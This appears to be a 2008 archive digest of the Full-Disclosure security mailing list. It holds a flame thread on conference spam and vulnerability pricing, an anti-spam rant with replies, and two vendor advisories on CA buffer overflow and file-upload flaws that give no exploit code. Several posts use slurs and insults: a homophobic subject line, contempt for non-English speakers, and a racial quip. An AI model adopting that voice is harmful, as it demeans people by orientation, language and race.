> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
> Sent: Thursday, April 03, 2008 5:39 PM
> To: Garrett M. Groff; n3td3v; full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Fwd: Let's outlaw
> masssecurityconferencespamming its f****** gay
> 
> On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com>
> wrote:
>> Regarding the particular person in question, I'll defer to others who 
>> know him (or her, or they, or whomever) better than I do. Instead, 
>> I'll say that, generally, on lists like FD, there is a minority of 
>> out-spoken personalities who sadly support the stereotypical hacker 
>> persona: condescending egoists who are socially inept and emotionally 
>> charged when discussing topics that relate to their knowledge domain. 
>> That's unfortunate, since the broader IT security community is poorly
> represented due to attention-seeking zealots.
>> Regarding the idea of "oulawing security conference spamming," I'd say 
>> the literal idea of outlawing cross-posts to multiple security mailing 
>> lists is a bad idea. The idea that the legislature should write into 
>> law legislation that reduces our freedom in such a sense is a slippery 
>> slope borne of emotionalism and narrowness. What else should the 
>> government do to curtail our freedoms? I tend to side with libertarian 
>> types (though I don't call myself a "libertarian" un-qualified) on 
>> what the government should do and what they should not do. And 
>> micro-manage security mailing lists is something they should not do. 
>> It's a bad idea and would make a dreadful precedent.
> 
> Full-Disclosure is ment to be about free source, not making money. I'm
> against people who make money come on the mailing lists, its commerical
> spam. We can't allow this to continue, here are what I don't like:
> 
> - Come to our conference - profit... buy our ticket, get a macbook prize.
> 
> - Hacking challenge prize - profit... they give you $5000 and sell it to the
> vendor for a lot more.
> 
> - Train to use our software -profit... over priced training for software...
> not interested.
> 
> On the issue of how much a vulnerability is worth, the prices are not
> regulated, we need regulation into how much a vulnerability costs, because
> the prices right now are wild. We need to take vulnerability pricing off the
> blackmarket and onto a legitimate central website for selling
> vulnerabilities, or cash rewards for disclosing a vulnerability to a
> particular company or organisation. I don't like sites like digital
> armaments which when i visited it, the content and answers they gave were
> questionable, and people have complained about digital armaments in the
> past. Its time to get pricing regulated and defined, so everyone knows whos
> being joe jobbed and who isn't.
> 
> Can someone post to full-disclosure a price list of what they think a
> bufferoverflow should be worth etc, and we can vote if we agree.
> 
> So what i'm calling for is someone to post up a hackers price list per
> vulnerability type.
> 
> XSS/SQL should be worth something as well, so Morning_Wood can buy milk and
> a news paper in the mornings after he's taken care of his wood.
> 
> Sorry i've ended this e-mail with slightly off-topicness, but I do think
> pricing needs to be defined.
> 
> We can't dress up cash prizes/contests as something else as well, if a
> website is offering a $5,000 reward for a vulnerability, we need to know if
> we're being ripped off with the cash reward and how much can be potentially
> made after its sold on.
> 
> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash reward
> might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit CanSecWest
> make overall from people attending the conference.
> 
> So you take into consideration how much a vulnerability should be worth,
> then the added worth because its a security conference of how much should be
> added on to counter the profit being made by the event.
> 
> A vulnerability should be worth more if its disclosed at a security
> conference than if its bought privately, because you've got to take in
> profit  and free advertsing to calculate.
> 
> However, to round off, we can't allow the mailing lists to turn into a
> vulnerability market place, full-disclosure should be for free stuff, and
> other websites and mailing lists can be setup for *money making schemes and
> auctions*.
> 
> We shouldn't allow the money makers directly to market X... if a link is put
> on Full-Disclosure by a member of the public on the fly then thats ok, but I
> think its cheeky for the particular conference, contest runner or software
> trainer to be on the list themselves spamming everyone, for a profiteering
> agenda.
> 
> You mention cross-posting, thats not the issue here, its the people making
> the money posting to make the money that offends me so much.
> 
> And not even the lonely hacker offends me who posts i've got a vulnerability
> for sale for X, I don't mind that on Full-Disclosure, but what I do mind is
> if its a company or organisation doing it that is directly the ones making
> the money via vulnerability for sale, prize contest, security conference or
> train to use our software!!!, thats the height of spam I just think is
> utterly wrong and unethical on any scale of acceptability.
> 
> If a lonley hacker who works in a supermarket has a vulnerabilty to sell i'm
> all for it being post on full-disclosure, but not the big money conferences,
> prize hacking contests and software training guys.
> 
> I come under the bracket as supermarket worker with nothing much going for
> me in life, so I should be allowed to sell a vulnerability on what's ment to
> be a mailing list for non-profit disclosure.
> 
> If we tolerate the money making schemes much longer, eventually
> full-disclosure will be a wash with conference,training,cash prize spam, etc
> once everyone realises the full value of vulnerabilities and the huge
> amounts of money to be made from setting up a cash prize contest, the huge
> amounts of money to be made from setting up a security conference and the
> huge amounts of money to be made from training people to use your hax0r
> software.
> 
> You will find it easy to shout me down and say n3td3v's an idiot, but wait
> to the vulnerability market really takes off and the prices of
> vulnerabilities are properly defined and regulated, you're going to see a
> huge increase in commercial spam on the mailing lists, like the
> full-disclosure mailing list. so we've got to define what's fair play e-mail
> and what's a company or organisation blatantly profiteering with X method of
> extracting money out of people and using skilled hackers to make money, and
> to promote a security conference, training etc.
> 
> All the best,
> 
> n3td3v
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9bDds+9h2X0fCGcRAmD+AJ4/2PF87IAmuQDZJ4hZB6ZEGtgIMgCfWJJm
FJ+rbr0tUqoFTJ1PoIi8I+c=
=Z3O6
-----END PGP SIGNATURE-----



From redhowlingwolves at nc.rr.com  Fri Apr  4 05:28:07 2008
From: redhowlingwolves at nc.rr.com (scott)
Date: Fri, 04 Apr 2008 00:28:07 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw
 mass	securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>	<27886.1207189079@turing-police.cc.vt.edu>	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>	<030b01c89543$0b481540$6401a8c0@maryl>	<C4B44D4D4D0053622A781365@Macintosh.local>	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <47F5AE57.6070502@nc.rr.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

O how I love your posts. They're all over the place, and at the same
time, primitive.

I would normally filter such a troll as you, but you keep me in stitches!!

N3td3v rocks!! Just not in the way he thinks!!

n3td3v wrote:
> On Thu, Apr 3, 2008 at 3:02 PM, Garrett M. Groff <groffg at gmgdesign.com> wrote:
>> Regarding the particular person in question, I'll defer to others who know
>> him (or her, or they, or whomever) better than I do. Instead, I'll say that,
>> generally, on lists like FD, there is a minority of out-spoken personalities
>> who sadly support the stereotypical hacker persona: condescending egoists
>> who are socially inept and emotionally charged when discussing topics that
>> relate to their knowledge domain. That's unfortunate, since the broader IT
>> security community is poorly represented due to attention-seeking zealots.
>>
>> Regarding the idea of "oulawing security conference spamming," I'd say the
>> literal idea of outlawing cross-posts to multiple security mailing lists is
>> a bad idea. The idea that the legislature should write into law legislation
>> that reduces our freedom in such a sense is a slippery slope borne of
>> emotionalism and narrowness. What else should the government do to curtail
>> our freedoms? I tend to side with libertarian types (though I don't call
>> myself a "libertarian" un-qualified) on what the government should do and
>> what they should not do. And micro-manage security mailing lists is
>> something they should not do. It's a bad idea and would make a dreadful
>> precedent.
> 
> Full-Disclosure is ment to be about free source, not making money. I'm
> against people who make money come on the mailing lists, its
> commerical spam. We can't allow this to continue, here are what I
> don't like:
> 
> - Come to our conference - profit... buy our ticket, get a macbook prize.
> 
> - Hacking challenge prize - profit... they give you $5000 and sell it
> to the vendor for a lot more.
> 
> - Train to use our software -profit... over priced training for
> software... not interested.
> 
> On the issue of how much a vulnerability is worth, the prices are not
> regulated, we need regulation into how much a vulnerability costs,
> because the prices right now are wild. We need to take vulnerability
> pricing off the blackmarket and onto a legitimate central website for
> selling vulnerabilities, or cash rewards for disclosing a
> vulnerability to a particular company or organisation. I don't like
> sites like digital armaments which when i visited it, the content and
> answers they gave were questionable, and people have complained about
> digital armaments in the past. Its time to get pricing regulated and
> defined, so everyone knows whos being joe jobbed and who isn't.
> 
> Can someone post to full-disclosure a price list of what they think a
> bufferoverflow should be worth etc, and we can vote if we agree.
> 
> So what i'm calling for is someone to post up a hackers price list per
> vulnerability type.
> 
> XSS/SQL should be worth something as well, so Morning_Wood can buy
> milk and a news paper in the mornings after he's taken care of his
> wood.
> 
> Sorry i've ended this e-mail with slightly off-topicness, but I do
> think pricing needs to be defined.
> 
> We can't dress up cash prizes/contests as something else as well, if a
> website is offering a $5,000 reward for a vulnerability, we need to
> know if we're being ripped off with the cash reward and how much can
> be potentially made after its sold on.
> 
> Robert Lemos even http://www.securityfocus.com/news/11510 talked about
> vulnerability pricing when Pwn2Own was on, and even Pwn2Own cash
> reward might not be enough money, compared to what a vulnerability
> *should* be worth, and taking into consideration how much profit
> CanSecWest make overall from people attending the conference.
> 
> So you take into consideration how much a vulnerability should be
> worth, then the added worth because its a security conference of how
> much should be added on to counter the profit being made by the event.
> 
> A vulnerability should be worth more if its disclosed at a security
> conference than if its bought privately, because you've got to take in
> profit  and free advertsing to calculate.
> 
> However, to round off, we can't allow the mailing lists to turn into a
> vulnerability market place, full-disclosure should be for free stuff,
> and other websites and mailing lists can be setup for *money making
> schemes and auctions*.
> 
> We shouldn't allow the money makers directly to market X... if a link
> is put on Full-Disclosure by a member of the public on the fly then
> thats ok, but I think its cheeky for the particular conference,
> contest runner or software trainer to be on the list themselves
> spamming everyone, for a profiteering agenda.
> 
> You mention cross-posting, thats not the issue here, its the people
> making the money posting to make the money that offends me so much.
> 
> And not even the lonely hacker offends me who posts i've got a
> vulnerability for sale for X, I don't mind that on Full-Disclosure,
> but what I do mind is if its a company or organisation doing it that
> is directly the ones making the money via vulnerability for sale,
> prize contest, security conference or train to use our software!!!,
> thats the height of spam I just think is utterly wrong and unethical
> on any scale of acceptability.
> 
> If a lonley hacker who works in a supermarket has a vulnerabilty to
> sell i'm all for it being post on full-disclosure, but not the big
> money conferences, prize hacking contests and software training guys.
> 
> I come under the bracket as supermarket worker with nothing much going
> for me in life, so I should be allowed to sell a vulnerability on
> what's ment to be a mailing list for non-profit disclosure.
> 
> If we tolerate the money making schemes much longer, eventually
> full-disclosure will be a wash with conference,training,cash prize
> spam, etc once everyone realises the full value of vulnerabilities and
> the huge amounts of money to be made from setting up a cash prize
> contest, the huge amounts of money to be made from setting up a
> security conference and the huge amounts of money to be made from
> training people to use your hax0r software.
> 
> You will find it easy to shout me down and say n3td3v's an idiot, but
> wait to the vulnerability market really takes off and the prices of
> vulnerabilities are properly defined and regulated, you're going to
> see a huge increase in commercial spam on the mailing lists, like the
> full-disclosure mailing list. so we've got to define what's fair play
> e-mail and what's a company or organisation blatantly profiteering
> with X method of extracting money out of people and using skilled
> hackers to make money, and to promote a security conference, training
> etc.
> 
> All the best,
> 
> n3td3v
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH9a5Xs+9h2X0fCGcRAqokAJ0SlqW+YckeRwdGtR2U8KoNu8pyUACgtCub
1jKptMdCec2P6fpyfFR4eAI=
=RqWO
-----END PGP SIGNATURE-----



From randallm at fidmail.com  Thu Apr  3 23:50:12 2008
From: randallm at fidmail.com (RM)
Date: Thu, 3 Apr 2008 17:50:12 -0500
Subject: [Full-disclosure] angry
Message-ID: <a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com>

Sorry. I am angry and tired.

"I WANT STUPID NON-ENGLISH SPEAKING  IDIOTS TO STOP SPAMMING ME WITH YOUR
MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!

-- 
There, I feel better.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080403/eaf5da67/attachment.html 

From mlande at bellsouth.net  Fri Apr  4 11:25:36 2008
From: mlande at bellsouth.net (Mary Landesman)
Date: Fri, 4 Apr 2008 06:25:36 -0400
Subject: [Full-disclosure] angry
In-Reply-To: <a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com>
References: <a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com>
Message-ID: <046001c8963e$39278850$6401a8c0@maryl>

Are you saying you are ok with stupid English-speaking idiots spamming you?

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of RM
Sent: Thursday, April 03, 2008 6:50 PM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] angry

Sorry. I am angry and tired.

"I WANT STUPID NON-ENGLISH SPEAKING  IDIOTS TO STOP SPAMMING ME WITH YOUR
MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!

--
There, I feel better.




From jeff.stebelton at gmail.com  Fri Apr  4 12:56:38 2008
From: jeff.stebelton at gmail.com (Jeff Stebelton)
Date: Fri, 04 Apr 2008 07:56:38 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw
 mass	securityconferencespamming its f****** gay
In-Reply-To: <4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>	<27886.1207189079@turing-police.cc.vt.edu>	<fec013240804021927h432e01bfyb6add150141cda87@mail.gmail.com>	<030b01c89543$0b481540$6401a8c0@maryl>	<C4B44D4D4D0053622A781365@Macintosh.local>	<82abd3a70804030111q4896dc76h2c51434ad45c9885@mail.gmail.com>	<6158bb410804030645w4057c055o503ff0302f87e1f8@mail.gmail.com>	<004e01c89593$4cec60f0$336b880a@softpro.corp>
	<4b6ee9310804031438vde21ff8od59b6c66325f5d05@mail.gmail.com>
Message-ID: <47F61776.6080001@gmail.com>

This is an unmoderated list. Unmoderated:

What's an unmoderated list?
An unmoderated list is one where your messages are automatically sent to 
all the other list subscribers, without human intervention.

Unmoderated.

 From seclists.org:

Full Disclosure -- An unmoderated high-traffic forum for disclosure of 
security information. Fresh vulnerabilities sometimes hit this list many 
hours before they pass through the Bugtraq moderation queue. The relaxed 
atmosphere of this quirky list provides some comic relief and certain 
industry gossip. Unfortunately 80% of the posts are worthless drivel, so 
finding the gems takes patience.

Truer words never spoken. =-)


n3td3v wrote:
> Full-Disclosure is ment to be about free source, not making money. I'm
> against people who make money come on the mailing lists, its
> commerical spam. We can't allow this to continue, here are what I
> don't like:
>
>   



From Dirk_Kollberg at avertlabs.com  Fri Apr  4 11:36:57 2008
From: Dirk_Kollberg at avertlabs.com (Kollberg, Dirk)
Date: Fri, 4 Apr 2008 11:36:57 +0100
Subject: [Full-disclosure] angry
In-Reply-To: <046001c8963e$39278850$6401a8c0@maryl>
Message-ID: <EE260590616AFF4DAF50D63F91C522CB40578A@aylav1exmb1.corp.avertlabs.internal>

I think he should more worry about they way how they found out 
he has a need for penis enlangements or loan.

BTW, if someone know why I receive these penis reduction spam, 
please let me know.

Thanks,
Dirk

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mary
Landesman
Sent: Freitag, 4. April 2008 12:26
To: full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] angry

Are you saying you are ok with stupid English-speaking idiots spamming
you?

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of RM
Sent: Thursday, April 03, 2008 6:50 PM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] angry

Sorry. I am angry and tired.

"I WANT STUPID NON-ENGLISH SPEAKING  IDIOTS TO STOP SPAMMING ME WITH
YOUR
MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!

I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!

--
There, I feel better.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From James.Williams at ca.com  Fri Apr  4 13:25:31 2008
From: James.Williams at ca.com (Williams, James K)
Date: Fri, 4 Apr 2008 08:25:31 -0400
Subject: [Full-disclosure] CA Alert Notification Server Multiple
	Vulnerabilities
Message-ID: <649CDCB56C88AA458EFF2CBF494B62040495BCF5@USILMS12.ca.com>


Title: CA Alert Notification Server Multiple Vulnerabilities

CA Advisory Date: 2008-04-03

Reported By: An anonymous researcher working with the iDefense VCP

Impact: A remote authenticated attacker can execute arbitrary code 
or cause a denial of service condition.

Summary: CA Alert Notification Server service contains multiple 
vulnerabilities that can allow a remote authenticated attacker to 
execute arbitrary code or cause a denial of service condition. CA 
has issued updates to address the vulnerabilities. The 
vulnerabilities, CVE-2007-4620, are due to insufficient bounds 
checking in multiple procedures. A remote authenticated attacker 
or local user can exploit a buffer overflow to execute arbitrary 
code or cause a denial of service.

Mitigating Factors: Remote attacker must have legitimate 
authentication credentials.

Severity: CA has given these vulnerabilities a maximum risk rating 
of High.

Affected Products:
CA Anti-Virus for the Enterprise 7.1
CA Threat Manager for the Enterprise (formerly eTrust Integrated 
   Threat Management) r8
CA Threat Manager for the Enterprise (formerly eTrust Integrated 
   Threat Management) r8.1
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1
BrightStor ARCserve Backup r11.5
BrightStor ARCserve Backup r11.1
BrightStor ARCserve Backup r11 for Windows

Affected Platforms:
Windows

Status and Recommendation:
CA has provided updates to address the vulnerabilities.
CA Anti-Virus for the Enterprise 7.1, CA Anti-Virus for the 
Enterprise r8:  QO96079
CA Threat Manager for the Enterprise r8:  QO96387
CA Anti-Virus for the Enterprise r8.1, CA Threat Manager for the 
   Enterprise r8.1:  QO96080
BrightStor ARCserve Backup r11.5, BrightStor ARCserve Backup 
   r11.1:  QO96079
BrightStor ARCserve Backup r11.0:  Upgrade to 11.1 and apply the 
   latest patches.

How to determine if you are affected:

For products on Windows:
   1. Using Windows Explorer, locate the file "alert.exe". By 
      default, the file is located in the 
      "C:\Program Files\CA\SharedComponents\Alert" directory.
   2. Right click on the file and select Properties.
   3. Select the Version tab.
   4. If the file version is earlier than indicated in the below 
      table, the installation is vulnerable.

Product                                    File       Version
CA Anti-Virus for the Enterprise r8.1      Alert.exe  8.1.586.0
CA Threat Manager for the Enterprise 8.1   Alert.exe  8.1.586.0
CA Threat Manager for the Enterprise r8    Alert.exe  8.0.450.0
CA Anti-Virus for the Enterprise 7.1       Alert.exe  7.1.758.0
CA Anti-Virus for the Enterprise r8        Alert.exe  7.1.758.0
BrightStor ARCserve Backup r11.5           Alert.exe  7.1.758.0
BrightStor ARCserve Backup r11.1           Alert.exe  7.1.758.0

Workaround: None

References (URLs may wrap):
CA Support:
http://support.ca.com/
Security Notice for Alert Notification Server
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173103
Solution Document Reference APARs:
QO96079, QO96387, QO96080, QO96079
CA Security Response Blog posting:
CA Alert Notification Server Multiple Vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2008/04/04/\
ca-alert-notification-server-multiple-vulnerabilities.aspx
Reported By: 
An anonymous researcher working with the iDefense VCP
CVE References:
CVE-2007-4620
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4620
OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749
	
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA. All rights reserved.

From kf_lists at digitalmunition.com  Fri Apr  4 13:55:37 2008
From: kf_lists at digitalmunition.com (Kevin Finisterre (lists))
Date: Fri, 4 Apr 2008 08:55:37 -0400
Subject: [Full-disclosure] angry
In-Reply-To: <EE260590616AFF4DAF50D63F91C522CB40578A@aylav1exmb1.corp.avertlabs.internal>
References: <EE260590616AFF4DAF50D63F91C522CB40578A@aylav1exmb1.corp.avertlabs.internal>
Message-ID: <E3D3E947-44DB-432D-AE25-DC584DAECF40@digitalmunition.com>

You are black too?
-KF

On Apr 4, 2008, at 6:36 AM, Kollberg, Dirk wrote:
>
>
> BTW, if someone know why I receive these penis reduction spam,
> please let me know.
>
> Thanks,
> Dirk
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Mary
> Landesman
> Sent: Freitag, 4. April 2008 12:26
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] angry
>
> Are you saying you are ok with stupid English-speaking idiots spamming
> you?
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of RM
> Sent: Thursday, April 03, 2008 6:50 PM
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] angry
>
> Sorry. I am angry and tired.
>
> "I WANT STUPID NON-ENGLISH SPEAKING  IDIOTS TO STOP SPAMMING ME WITH
> YOUR
> MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!
>
> I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!
>
> --
> There, I feel better.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



From James.Williams at ca.com  Fri Apr  4 14:06:30 2008
From: James.Williams at ca.com (Williams, James K)
Date: Fri, 4 Apr 2008 09:06:30 -0400
Subject: [Full-disclosure] CA ARCserve Backup for Laptops and Desktops
	Server and CA Desktop Management Suite Multiple Vulnerabilities
Message-ID: <649CDCB56C88AA458EFF2CBF494B62040495BD19@USILMS12.ca.com>


Title: CA ARCserve Backup for Laptops and Desktops Server and CA 
Desktop Management Suite Multiple Vulnerabilities

CA Advisory Date: 2008-04-03

Reported By: Dyon Balding of Secunia Research

Impact: A remote attacker can execute arbitrary code or cause a 
denial of service condition.

Summary: CA ARCserve Backup for Laptops and Desktops Server 
contains multiple vulnerabilities that can allow a remote attacker 
to execute arbitrary code or cause a denial of service condition. 
CA has issued updates to address the vulnerabilities. The first 
issue, CVE-2008-1328, occurs due to insufficient bounds checking 
on command arguments by the LGServer service. The second issue, 
CVE-2008-1329, occurs due to insufficient verification of file 
uploads by the NetBackup service. In most cases, an attacker can 
potentially gain complete control of an affected installation. 
Additionally, only a server installation of BrightStor ARCserve 
Backup for Laptops and Desktops is affected. The client 
installation is not affected.

Note: the previously published patches for CVE-2007-3216 and 
CVE-2007-5005 did not fully address some issues.

Mitigating Factors: Client installations are not affected.

Severity: CA has given these vulnerabilities a maximum risk rating 
of High.

Affected Products:
CA ARCserve Backup for Laptops and Desktops r11.5
CA ARCserve Backup for Laptops and Desktops r11.1 SP2
CA ARCserve Backup for Laptops and Desktops r11.1 SP1
CA ARCserve Backup for Laptops and Desktops r11.1
CA ARCserve Backup for Laptops and Desktops r11.0
CA Desktop Management Suite 11.2 English
CA Desktop Management Suite 11.2 localized
CA Desktop Management Suite 11.1

Affected Platforms:
Windows

Status and Recommendation:
CA has provided updates to address the vulnerabilities.
CA ARCserve Backup for Laptops and Desktops 11.1, 11.1 SP1, 11.2 
   SP2:  QO95512
CA ARCserve Backup for Laptops and Desktops 11.5:  QO95513
CA Desktop Management Suite 11.2 English:  QO95513
CA Desktop Management Suite 11.2 localized:  QO95513
CA Desktop Management Suite 11.1:  Upgrade to 11.1 C1.
CA ARCserve Backup for Laptops and Desktops 11.0:  Upgrade to 
  ARCserve Backup for Laptops and Desktops version 11.1 and apply 
  the latest patches.  QI85497

How to determine if you are affected:

For Windows:
   1. Using Windows Explorer, locate the file "rxRPC.dll". The 
      file can be found in the following default locations:
   Product:  CA ARCserve Backup for Laptops and Desktops 11.5
   Directory Path:  C:\Program Files\CA\BrightStor ARCserve Backup 
      for Laptops & Desktops\Explorer
   Product:  CA ARCserve Backup for Laptops and Desktops 11.1	
   Directory Path:  C:\Program Files\CA\BrightStor ARCserve Backup 
      for Laptops & Desktops\server
   Product:  CA Desktop Management Suite 11.2 English
   Directory Path:  C:\Program Files\CA\DSM\BABLD\MGUI
   Product:  CA Desktop Management Suite 11.2 localized
   Directory Path:  C:\Program Files\CA\DSM\BABLD\MGUI
   2. Right click on the files and select Properties.
   3. Select the General tab.
   4. If the file date is earlier than indicated in the below 
      table, the installation is vulnerable.

Product     File Name     File Date / Size
CA ARCserve Backup for Laptops and Desktops 11.5
   rxRPC.dll     February 18 2008 / 126976
CA ARCserve Backup for Laptops and Desktops 11.1
   rxRPC.dll     February 18 2008 / 114688
CA Desktop Management Suite 11.2 English
   rxRPC.dll     February 18 2008 / 126976
CA Desktop Management Suite 11.2 localized
   rxRPC.dll     February 18 2008 / 126976

Workaround: None

References (URLs may wrap):
CA Support:
http://support.ca.com/
Security Notice for CA ARCserve Backup for Laptops and Desktops 
Server and CA Desktop Management Suite
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=173105
Solution Document Reference APARs:
QO95512, QO95513, QI85497
CA Security Response Blog posting:
CA ARCserve Backup for Laptops and Desktops Server and CA Desktop 
Management Suite Multiple Vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2008/04/04/\
ca-arcserve-backup-for-laptops-and-desktops-server-and-ca-desktop-\
management-suite-multiple-vulnerabilities.aspx
Reported By: 
Dyon Balding of Secunia Research
CVE References:
CVE-2008-1328 and CVE-2008-1329
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1328
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1329
OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, 1 CA Plaza, Islandia, NY 11749
	
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA. All rights reserved.

From urlancomp at gmail.com  Fri Apr  4 15:22:17 2008
From: urlancomp at gmail.com (Urlan)
Date: Fri, 4 Apr 2008 11:22:17 -0300
Subject: [Full-disclosure] angry
In-Reply-To: <a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com>
References: <a0902a9c0804031550xf561d0dwc27f147d6ed39926@mail.gmail.com>
Message-ID: <8b88d71c0804040722y6fe0c45cpf9948fe799fa88c0@mail.gmail.com>

F?cil, ? s? sair da lista =D.

Urlan

On Thu, Apr 3, 2008 at 7:50 PM, RM <randallm at fidmail.com> wrote:

> Sorry. I am angry and tired.
>
> "I WANT STUPID NON-ENGLISH SPEAKING  IDIOTS TO STOP SPAMMING ME WITH YOUR
> MIS_SPELLING/PENIS_ENLARGING/GET_A_LOAN BULLSHIT EMAILS!
>
> I AM ANGRY AND I'M NOT GOING TO TAKE IT ANYMORE!
>
> --
> There, I feel better.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080404/579db8fb/attachment.html 

From ureleet at gmail.com  Fri Apr  4 15:31:14 2008
From: ureleet at gmail.com (Ureleet)
Date: Fri, 4 Apr 2008 10:31:14 -0400
Subject: [Full-disclosure] n3td3v has a fan
In-Reply-To: <2d792fb20804030620i795b851cu90c69b3f37dd82e5@mail.gmail.com>
References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>
